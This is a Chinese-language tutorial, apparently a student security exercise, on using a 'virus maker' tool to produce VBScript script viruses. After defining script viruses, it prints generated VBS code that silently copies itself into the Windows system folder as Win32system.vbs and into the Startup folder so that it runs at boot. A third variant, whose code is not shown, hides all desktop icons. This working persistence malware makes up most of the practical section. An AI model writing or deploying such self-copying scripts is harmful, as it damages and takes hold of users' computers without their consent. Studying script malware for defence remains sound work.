利用“病毒制造机”实现脚本病毒的制造

一、脚本病毒的概念:


      脚本病毒通常是 JavaScript 或 VBScript 等语言编写的恶意代码,一般广告性质,会修改 IE 首页、修改注册表等信息,对用户计算机造成破坏。 通过网页进行的传播的病毒较为典型,脚本病毒还会有如下前缀:VBS、JS(表明是何种脚本编写的),如欢乐时光(VBS.Happytime)、十四日(Js.Fortnight.c.s)、红色代码(Script.Redlof)等。一般具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性等不良特性;其生命周期一般为开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。


二、实践3种不同功能的脚本病毒:

1.将一个Win32system的vbs文件写入system32系统文件夹中:

(1)利用病毒生成器生成的这个vbs病毒代码如下:

On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs")

(2)带注释的版本:

利用“病毒制造机”实现脚本病毒的制造_第1张图片

(3)效果:

利用“病毒制造机”实现脚本病毒的制造_第2张图片 

2. 写入到开始菜单中的版本:

On Error Resume Next

set fso = createobject("scripting.filesystemobject") 
set ws = createobject("wscript.shell")
pt=ws.specialfolders("startup")&"\"
set file = fso.getfile(wscript.scriptfullname)
file.copy pt

Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs")

(2)带注释的版本:

利用“病毒制造机”实现脚本病毒的制造_第3张图片

(3)效果,反正我没有成功,

不过借用了 上面那个它另外给的代码后,在开启菜单中出现了这个vbs文件本身的副本

3.禁用桌面所有图标的版本

(1)生成的代码:

(2)带注释的版本:

利用“病毒制造机”实现脚本病毒的制造_第4张图片

(3)效果:

桌边的所有图标都不能显示了,但是开始菜单还是可以打开的 

你可能感兴趣的:(软件安全相关,病毒)